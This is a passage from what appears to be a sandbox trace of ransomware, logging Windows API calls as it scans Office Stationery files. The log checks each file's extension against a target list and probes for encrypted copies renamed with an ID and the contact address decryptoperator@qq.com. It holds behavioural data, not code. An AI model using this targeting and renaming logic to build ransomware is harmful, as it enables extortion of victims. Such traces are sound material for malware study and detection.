Shared\\Stationery\\Desktop.ini" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\desktop.ini")) returned 1 [0042.709] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Desktop.ini") returned 69 [0042.709] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Desktop.ini") returned 69 [0042.709] lstrlenW (lpString=".doc") returned 4 [0042.709] lstrcmpiW (lpString1=".doc", lpString2=".ini") returned -1 [0042.709] lstrlenW (lpString=".docx") returned 5 [0042.709] lstrcmpiW (lpString1=".docx", lpString2="p.ini") returned -1 [0042.709] lstrlenW (lpString=".pdf") returned 4 [0042.709] lstrcmpiW (lpString1=".pdf", lpString2=".ini") returned 1 [0042.709] lstrlenW (lpString=".xls") returned 4 [0042.709] lstrcmpiW (lpString1=".xls", lpString2=".ini") returned 1 [0042.709] lstrlenW (lpString=".xlsx") returned 5 [0042.709] lstrcmpiW (lpString1=".xlsx", lpString2="p.ini") returned -1 [0042.709] lstrlenW (lpString=".ppt") returned 4 [0042.709] lstrcmpiW (lpString1=".ppt", lpString2=".ini") returned 1 [0042.709] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Desktop.ini") returned 69 [0042.709] lstrlenW (lpString=".zip") returned 4 [0042.709] lstrcmpiW (lpString1=".zip", lpString2=".ini") returned 1 [0042.709] lstrlenW (lpString=".rar") returned 4 [0042.709] lstrcmpiW (lpString1=".rar", lpString2=".ini") returned 1 [0042.709] lstrlenW (lpString=".bz2") returned 4 [0042.709] lstrcmpiW (lpString1=".bz2", lpString2=".ini") returned -1 [0042.709] lstrlenW (lpString=".7z") returned 3 [0042.709] lstrcmpiW (lpString1=".7z", lpString2="ini") returned -1 [0042.709] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Desktop.ini") returned 69 [0042.709] lstrlenW (lpString=".dbf") returned 4 [0042.710] lstrcmpiW (lpString1=".dbf", lpString2=".ini") returned -1 [0042.710] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Desktop.ini") returned 69 [0042.710] lstrlenW (lpString=".1cd") returned 4 [0042.710] lstrcmpiW (lpString1=".1cd", lpString2=".ini") returned -1 [0042.710] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Desktop.ini") returned 69 [0042.710] lstrlenW (lpString=".jpg") returned 4 [0042.710] lstrcmpiW (lpString1=".jpg", lpString2=".ini") returned 1 [0042.710] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Desktop.ini") returned 69 [0042.710] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Desktop.ini") returned 69 [0042.710] lstrlenW (lpString=".doc") returned 4 [0042.710] lstrcmpiW (lpString1=".doc", lpString2=".ini") returned -1 [0042.710] lstrlenW (lpString=".docx") returned 5 [0042.710] lstrcmpiW (lpString1=".docx", lpString2="p.ini") returned -1 [0042.710] lstrlenW (lpString=".pdf") returned 4 [0042.710] lstrcmpiW (lpString1=".pdf", lpString2=".ini") returned 1 [0042.710] lstrlenW (lpString=".xls") returned 4 [0042.710] lstrcmpiW (lpString1=".xls", lpString2=".ini") returned 1 [0042.710] lstrlenW (lpString=".xlsx") returned 5 [0042.710] lstrcmpiW (lpString1=".xlsx", lpString2="p.ini") returned -1 [0042.710] lstrlenW (lpString=".ppt") returned 4 [0042.710] lstrcmpiW (lpString1=".ppt", lpString2=".ini") returned 1 [0042.710] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Desktop.ini") returned 69 [0042.710] lstrlenW (lpString=".zip") returned 4 [0042.710] lstrcmpiW (lpString1=".zip", lpString2=".ini") returned 1 [0042.710] lstrlenW (lpString=".rar") returned 4 [0042.710] lstrcmpiW (lpString1=".rar", lpString2=".ini") returned 1 [0042.710] lstrlenW (lpString=".bz2") returned 4 [0042.710] lstrcmpiW (lpString1=".bz2", lpString2=".ini") returned -1 [0042.710] lstrlenW (lpString=".7z") returned 3 [0042.710] lstrcmpiW (lpString1=".7z", lpString2="ini") returned -1 [0042.710] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Desktop.ini") returned 69 [0042.711] lstrlenW (lpString=".dbf") returned 4 [0042.711] lstrcmpiW (lpString1=".dbf", lpString2=".ini") returned -1 [0042.711] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Desktop.ini") returned 69 [0042.711] lstrlenW (lpString=".1cd") returned 4 [0042.711] lstrcmpiW (lpString1=".1cd", lpString2=".ini") returned -1 [0042.711] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Desktop.ini") returned 69 [0042.711] lstrlenW (lpString=".jpg") returned 4 [0042.711] lstrcmpiW (lpString1=".jpg", lpString2=".ini") returned 1 [0042.711] lstrcmpiW (lpString1=".emf", lpString2=".cry") returned 1 [0042.711] lstrlenW (lpString="Dotted_Lines.emf") returned 16 [0042.711] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Dotted_Lines.emf" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\dotted_lines.emf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1bc [0042.711] GetFileSizeEx (in: hFile=0x1bc, lpFileSize=0x2edff1c | out: lpFileSize=0x2edff1c*=3792) returned 1 [0042.711] CloseHandle (hObject=0x1bc) returned 1 [0042.712] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Dotted_Lines.emf" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\dotted_lines.emf")) returned 0x20 [0042.712] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Dotted_Lines.emf.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\dotted_lines.emf.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0042.712] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Dotted_Lines.emf" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\dotted_lines.emf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0042.713] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Dotted_Lines.emf") returned 74 [0042.713] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Dotted_Lines.emf") returned 74 [0042.713] lstrlenW (lpString=".doc") returned 4 [0042.713] lstrcmpiW (lpString1=".doc", lpString2=".emf") returned -1 [0042.713] lstrlenW (lpString=".docx") returned 5 [0042.713] lstrcmpiW (lpString1=".docx", lpString2="s.emf") returned -1 [0042.713] lstrlenW (lpString=".pdf") returned 4 [0042.713] lstrcmpiW (lpString1=".pdf", lpString2=".emf") returned 1 [0042.713] lstrlenW (lpString=".xls") returned 4 [0042.713] lstrcmpiW (lpString1=".xls", lpString2=".emf") returned 1 [0042.713] lstrlenW (lpString=".xlsx") returned 5 [0042.713] lstrcmpiW (lpString1=".xlsx", lpString2="s.emf") returned -1 [0042.713] lstrlenW (lpString=".ppt") returned 4 [0042.713] lstrcmpiW (lpString1=".ppt", lpString2=".emf") returned 1 [0042.713] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Dotted_Lines.emf") returned 74 [0042.713] lstrlenW (lpString=".zip") returned 4 [0042.713] lstrcmpiW (lpString1=".zip", lpString2=".emf") returned 1 [0042.713] lstrlenW (lpString=".rar") returned 4 [0042.713] lstrcmpiW (lpString1=".rar", lpString2=".emf") returned 1 [0042.713] lstrlenW (lpString=".bz2") returned 4 [0042.713] lstrcmpiW (lpString1=".bz2", lpString2=".emf") returned -1 [0042.713] lstrlenW (lpString=".7z") returned 3 [0042.713] lstrcmpiW (lpString1=".7z", lpString2="emf") returned -1 [0042.713] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Dotted_Lines.emf") returned 74 [0042.713] lstrlenW (lpString=".dbf") returned 4 [0042.713] lstrcmpiW (lpString1=".dbf", lpString2=".emf") returned -1 [0042.713] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Dotted_Lines.emf") returned 74 [0042.713] lstrlenW (lpString=".1cd") returned 4 [0042.713] lstrcmpiW (lpString1=".1cd", lpString2=".emf") returned -1 [0042.713] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Dotted_Lines.emf") returned 74 [0042.713] lstrlenW (lpString=".jpg") returned 4 [0042.713] lstrcmpiW (lpString1=".jpg", lpString2=".emf") returned 1 [0042.714] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Dotted_Lines.emf") returned 74 [0042.714] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Dotted_Lines.emf") returned 74 [0042.714] lstrlenW (lpString=".doc") returned 4 [0042.714] lstrcmpiW (lpString1=".doc", lpString2=".emf") returned -1 [0042.714] lstrlenW (lpString=".docx") returned 5 [0042.714] lstrcmpiW (lpString1=".docx", lpString2="s.emf") returned -1 [0042.714] lstrlenW (lpString=".pdf") returned 4 [0042.714] lstrcmpiW (lpString1=".pdf", lpString2=".emf") returned 1 [0042.714] lstrlenW (lpString=".xls") returned 4 [0042.714] lstrcmpiW (lpString1=".xls", lpString2=".emf") returned 1 [0042.714] lstrlenW (lpString=".xlsx") returned 5 [0042.714] lstrcmpiW (lpString1=".xlsx", lpString2="s.emf") returned -1 [0042.714] lstrlenW (lpString=".ppt") returned 4 [0042.714] lstrcmpiW (lpString1=".ppt", lpString2=".emf") returned 1 [0042.714] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Dotted_Lines.emf") returned 74 [0042.714] lstrlenW (lpString=".zip") returned 4 [0042.714] lstrcmpiW (lpString1=".zip", lpString2=".emf") returned 1 [0042.714] lstrlenW (lpString=".rar") returned 4 [0042.714] lstrcmpiW (lpString1=".rar", lpString2=".emf") returned 1 [0042.714] lstrlenW (lpString=".bz2") returned 4 [0042.714] lstrcmpiW (lpString1=".bz2", lpString2=".emf") returned -1 [0042.714] lstrlenW (lpString=".7z") returned 3 [0042.714] lstrcmpiW (lpString1=".7z", lpString2="emf") returned -1 [0042.714] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Dotted_Lines.emf") returned 74 [0042.714] lstrlenW (lpString=".dbf") returned 4 [0042.714] lstrcmpiW (lpString1=".dbf", lpString2=".emf") returned -1 [0042.714] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Dotted_Lines.emf") returned 74 [0042.714] lstrlenW (lpString=".1cd") returned 4 [0042.714] lstrcmpiW (lpString1=".1cd", lpString2=".emf") returned -1 [0042.714] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Dotted_Lines.emf") returned 74 [0042.714] lstrlenW (lpString=".jpg") returned 4 [0042.714] lstrcmpiW (lpString1=".jpg", lpString2=".emf") returned 1 [0042.715] lstrcmpiW (lpString1=".htm", lpString2=".cry") returned 1 [0042.715] lstrlenW (lpString="Garden.htm") returned 10 [0042.715] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Garden.htm" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\garden.htm"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1bc [0042.715] GetFileSizeEx (in: hFile=0x1bc, lpFileSize=0x2edff1c | out: lpFileSize=0x2edff1c*=231) returned 1 [0042.715] CloseHandle (hObject=0x1bc) returned 1 [0042.715] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Garden.htm" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\garden.htm")) returned 0x20 [0042.715] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Garden.htm.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\garden.htm.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0042.715] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Garden.htm" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\garden.htm"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0042.715] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Garden.htm") returned 68 [0042.715] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Garden.htm") returned 68 [0042.715] lstrlenW (lpString=".doc") returned 4 [0042.715] lstrcmpiW (lpString1=".doc", lpString2=".htm") returned -1 [0042.715] lstrlenW (lpString=".docx") returned 5 [0042.715] lstrcmpiW (lpString1=".docx", lpString2="n.htm") returned -1 [0042.715] lstrlenW (lpString=".pdf") returned 4 [0042.715] lstrcmpiW (lpString1=".pdf", lpString2=".htm") returned 1 [0042.716] lstrlenW (lpString=".xls") returned 4 [0042.716] lstrcmpiW (lpString1=".xls", lpString2=".htm") returned 1 [0042.716] lstrlenW (lpString=".xlsx") returned 5 [0042.716] lstrcmpiW (lpString1=".xlsx", lpString2="n.htm") returned -1 [0042.716] lstrlenW (lpString=".ppt") returned 4 [0042.716] lstrcmpiW (lpString1=".ppt", lpString2=".htm") returned 1 [0042.716] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Garden.htm") returned 68 [0042.716] lstrlenW (lpString=".zip") returned 4 [0042.716] lstrcmpiW (lpString1=".zip", lpString2=".htm") returned 1 [0042.716] lstrlenW (lpString=".rar") returned 4 [0042.716] lstrcmpiW (lpString1=".rar", lpString2=".htm") returned 1 [0042.716] lstrlenW (lpString=".bz2") returned 4 [0042.716] lstrcmpiW (lpString1=".bz2", lpString2=".htm") returned -1 [0042.716] lstrlenW (lpString=".7z") returned 3 [0042.716] lstrcmpiW (lpString1=".7z", lpString2="htm") returned -1 [0042.716] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Garden.htm") returned 68 [0042.716] lstrlenW (lpString=".dbf") returned 4 [0042.716] lstrcmpiW (lpString1=".dbf", lpString2=".htm") returned -1 [0042.716] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Garden.htm") returned 68 [0042.716] lstrlenW (lpString=".1cd") returned 4 [0042.716] lstrcmpiW (lpString1=".1cd", lpString2=".htm") returned -1 [0042.716] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Garden.htm") returned 68 [0042.716] lstrlenW (lpString=".jpg") returned 4 [0042.716] lstrcmpiW (lpString1=".jpg", lpString2=".htm") returned 1 [0042.716] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Garden.htm") returned 68 [0042.716] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Garden.htm") returned 68 [0042.716] lstrlenW (lpString=".doc") returned 4 [0042.716] lstrcmpiW (lpString1=".doc", lpString2=".htm") returned -1 [0042.716] lstrlenW (lpString=".docx") returned 5 [0042.716] lstrcmpiW (lpString1=".docx", lpString2="n.htm") returned -1 [0042.716] lstrlenW (lpString=".pdf") returned 4 [0042.716] lstrcmpiW (lpString1=".pdf", lpString2=".htm") returned 1 [0042.717] lstrlenW (lpString=".xls") returned 4 [0042.717] lstrcmpiW (lpString1=".xls", lpString2=".htm") returned 1 [0042.717] lstrlenW (lpString=".xlsx") returned 5 [0042.717] lstrcmpiW (lpString1=".xlsx", lpString2="n.htm") returned -1 [0042.717] lstrlenW (lpString=".ppt") returned 4 [0042.717] lstrcmpiW (lpString1=".ppt", lpString2=".htm") returned 1 [0042.717] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Garden.htm") returned 68 [0042.717] lstrlenW (lpString=".zip") returned 4 [0042.717] lstrcmpiW (lpString1=".zip", lpString2=".htm") returned 1 [0042.717] lstrlenW (lpString=".rar") returned 4 [0042.717] lstrcmpiW (lpString1=".rar", lpString2=".htm") returned 1 [0042.717] lstrlenW (lpString=".bz2") returned 4 [0042.717] lstrcmpiW (lpString1=".bz2", lpString2=".htm") returned -1 [0042.717] lstrlenW (lpString=".7z") returned 3 [0042.717] lstrcmpiW (lpString1=".7z", lpString2="htm") returned -1 [0042.717] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Garden.htm") returned 68 [0042.717] lstrlenW (lpString=".dbf") returned 4 [0042.717] lstrcmpiW (lpString1=".dbf", lpString2=".htm") returned -1 [0042.717] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Garden.htm") returned 68 [0042.717] lstrlenW (lpString=".1cd") returned 4 [0042.717] lstrcmpiW (lpString1=".1cd", lpString2=".htm") returned -1 [0042.717] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Garden.htm") returned 68 [0042.717] lstrlenW (lpString=".jpg") returned 4 [0042.717] lstrcmpiW (lpString1=".jpg", lpString2=".htm") returned 1 [0042.717] lstrcmpiW (lpString1=".jpg", lpString2=".cry") returned 1 [0042.717] lstrlenW (lpString="Garden.jpg") returned 10 [0042.717] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Garden.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\garden.jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1bc [0042.718] GetFileSizeEx (in: hFile=0x1bc, lpFileSize=0x2edff1c | out: lpFileSize=0x2edff1c*=23871) returned 1 [0042.718] CloseHandle (hObject=0x1bc) returned 1 [0042.718] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Garden.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\garden.jpg")) returned 0x20 [0042.718] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Garden.jpg.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\garden.jpg.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0042.718] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Garden.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\garden.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0042.718] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Garden.jpg") returned 68 [0042.718] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Garden.jpg") returned 68 [0042.718] lstrlenW (lpString=".doc") returned 4 [0042.718] lstrcmpiW (lpString1=".doc", lpString2=".jpg") returned -1 [0042.718] lstrlenW (lpString=".docx") returned 5 [0042.718] lstrcmpiW (lpString1=".docx", lpString2="n.jpg") returned -1 [0042.718] lstrlenW (lpString=".pdf") returned 4 [0042.718] lstrcmpiW (lpString1=".pdf", lpString2=".jpg") returned 1 [0042.718] lstrlenW (lpString=".xls") returned 4 [0042.718] lstrcmpiW (lpString1=".xls", lpString2=".jpg") returned 1 [0042.718] lstrlenW (lpString=".xlsx") returned 5 [0042.718] lstrcmpiW (lpString1=".xlsx", lpString2="n.jpg") returned -1 [0042.718] lstrlenW (lpString=".ppt") returned 4 [0042.718] lstrcmpiW (lpString1=".ppt", lpString2=".jpg") returned 1 [0042.718] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Garden.jpg") returned 68 [0042.718] lstrlenW (lpString=".zip") returned 4 [0042.719] lstrcmpiW (lpString1=".zip", lpString2=".jpg") returned 1 [0042.719] lstrlenW (lpString=".rar") returned 4 [0042.719] lstrcmpiW (lpString1=".rar", lpString2=".jpg") returned 1 [0042.719] lstrlenW (lpString=".bz2") returned 4 [0042.719] lstrcmpiW (lpString1=".bz2", lpString2=".jpg") returned -1 [0042.719] lstrlenW (lpString=".7z") returned 3 [0042.719] lstrcmpiW (lpString1=".7z", lpString2="jpg") returned -1 [0042.719] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Garden.jpg") returned 68 [0042.719] lstrlenW (lpString=".dbf") returned 4 [0042.719] lstrcmpiW (lpString1=".dbf", lpString2=".jpg") returned -1 [0042.719] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Garden.jpg") returned 68 [0042.719] lstrlenW (lpString=".1cd") returned 4 [0042.719] lstrcmpiW (lpString1=".1cd", lpString2=".jpg") returned -1 [0042.719] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Garden.jpg") returned 68 [0042.719] lstrlenW (lpString=".jpg") returned 4 [0042.719] lstrcmpiW (lpString1=".jpg", lpString2=".jpg") returned 0 [0042.719] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Garden.jpg") returned 68 [0042.719] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Garden.jpg") returned 68 [0042.719] lstrlenW (lpString=".doc") returned 4 [0042.719] lstrcmpiW (lpString1=".doc", lpString2=".jpg") returned -1 [0042.719] lstrlenW (lpString=".docx") returned 5 [0042.719] lstrcmpiW (lpString1=".docx", lpString2="n.jpg") returned -1 [0042.719] lstrlenW (lpString=".pdf") returned 4 [0042.719] lstrcmpiW (lpString1=".pdf", lpString2=".jpg") returned 1 [0042.719] lstrlenW (lpString=".xls") returned 4 [0042.719] lstrcmpiW (lpString1=".xls", lpString2=".jpg") returned 1 [0042.719] lstrlenW (lpString=".xlsx") returned 5 [0042.719] lstrcmpiW (lpString1=".xlsx", lpString2="n.jpg") returned -1 [0042.719] lstrlenW (lpString=".ppt") returned 4 [0042.719] lstrcmpiW (lpString1=".ppt", lpString2=".jpg") returned 1 [0042.719] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Garden.jpg") returned 68 [0042.719] lstrlenW (lpString=".zip") returned 4 [0042.720] lstrcmpiW (lpString1=".zip", lpString2=".jpg") returned 1 [0042.720] lstrlenW (lpString=".rar") returned 4 [0042.720] lstrcmpiW (lpString1=".rar", lpString2=".jpg") returned 1 [0042.720] lstrlenW (lpString=".bz2") returned 4 [0042.720] lstrcmpiW (lpString1=".bz2", lpString2=".jpg") returned -1 [0042.720] lstrlenW (lpString=".7z") returned 3 [0042.720] lstrcmpiW (lpString1=".7z", lpString2="jpg") returned -1 [0042.720] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Garden.jpg") returned 68 [0042.720] lstrlenW (lpString=".dbf") returned 4 [0042.720] lstrcmpiW (lpString1=".dbf", lpString2=".jpg") returned -1 [0042.720] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Garden.jpg") returned 68 [0042.720] lstrlenW (lpString=".1cd") returned 4 [0042.720] lstrcmpiW (lpString1=".1cd", lpString2=".jpg") returned -1 [0042.720] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Garden.jpg") returned 68 [0042.720] lstrlenW (lpString=".jpg") returned 4 [0042.720] lstrcmpiW (lpString1=".jpg", lpString2=".jpg") returned 0 [0042.720] lstrcmpiW (lpString1=".emf", lpString2=".cry") returned 1 [0042.720] lstrlenW (lpString="Genko_1.emf") returned 11 [0042.720] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Genko_1.emf" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\genko_1.emf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1bc [0042.721] GetFileSizeEx (in: hFile=0x1bc, lpFileSize=0x2edff1c | out: lpFileSize=0x2edff1c*=5524) returned 1 [0042.721] CloseHandle (hObject=0x1bc) returned 1 [0042.721] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Genko_1.emf" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\genko_1.emf")) returned 0x20 [0042.721] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Genko_1.emf.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\genko_1.emf.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0042.721] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Genko_1.emf" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\genko_1.emf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0042.721] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Genko_1.emf") returned 69 [0042.721] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Genko_1.emf") returned 69 [0042.721] lstrlenW (lpString=".doc") returned 4 [0042.721] lstrcmpiW (lpString1=".doc", lpString2=".emf") returned -1 [0042.721] lstrlenW (lpString=".docx") returned 5 [0042.721] lstrcmpiW (lpString1=".docx", lpString2="1.emf") returned -1 [0042.722] lstrlenW (lpString=".pdf") returned 4 [0042.722] lstrcmpiW (lpString1=".pdf", lpString2=".emf") returned 1 [0042.722] lstrlenW (lpString=".xls") returned 4 [0042.722] lstrcmpiW (lpString1=".xls", lpString2=".emf") returned 1 [0042.722] lstrlenW (lpString=".xlsx") returned 5 [0042.722] lstrcmpiW (lpString1=".xlsx", lpString2="1.emf") returned -1 [0042.722] lstrlenW (lpString=".ppt") returned 4 [0042.722] lstrcmpiW (lpString1=".ppt", lpString2=".emf") returned 1 [0042.722] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Genko_1.emf") returned 69 [0042.722] lstrlenW (lpString=".zip") returned 4 [0042.722] lstrcmpiW (lpString1=".zip", lpString2=".emf") returned 1 [0042.722] lstrlenW (lpString=".rar") returned 4 [0042.722] lstrcmpiW (lpString1=".rar", lpString2=".emf") returned 1 [0042.722] lstrlenW (lpString=".bz2") returned 4 [0042.722] lstrcmpiW (lpString1=".bz2", lpString2=".emf") returned -1 [0042.722] lstrlenW (lpString=".7z") returned 3 [0042.722] lstrcmpiW (lpString1=".7z", lpString2="emf") returned -1 [0042.722] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Genko_1.emf") returned 69 [0042.722] lstrlenW (lpString=".dbf") returned 4 [0042.722] lstrcmpiW (lpString1=".dbf", lpString2=".emf") returned -1 [0042.722] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Genko_1.emf") returned 69 [0042.722] lstrlenW (lpString=".1cd") returned 4 [0042.722] lstrcmpiW (lpString1=".1cd", lpString2=".emf") returned -1 [0042.722] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Genko_1.emf") returned 69 [0042.722] lstrlenW (lpString=".jpg") returned 4 [0042.722] lstrcmpiW (lpString1=".jpg", lpString2=".emf") returned 1 [0042.722] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Genko_1.emf") returned 69 [0042.722] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Genko_1.emf") returned 69 [0042.722] lstrlenW (lpString=".doc") returned 4 [0042.722] lstrcmpiW (lpString1=".doc", lpString2=".emf") returned -1 [0042.722] lstrlenW (lpString=".docx") returned 5 [0042.722] lstrcmpiW (lpString1=".docx", lpString2="1.emf") returned -1 [0042.723] lstrlenW (lpString=".pdf") returned 4 [0042.723] lstrcmpiW (lpString1=".pdf", lpString2=".emf") returned 1 [0042.723] lstrlenW (lpString=".xls") returned 4 [0042.723] lstrcmpiW (lpString1=".xls", lpString2=".emf") returned 1 [0042.723] lstrlenW (lpString=".xlsx") returned 5 [0042.723] lstrcmpiW (lpString1=".xlsx", lpString2="1.emf") returned -1 [0042.723] lstrlenW (lpString=".ppt") returned 4 [0042.723] lstrcmpiW (lpString1=".ppt", lpString2=".emf") returned 1 [0042.723] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Genko_1.emf") returned 69 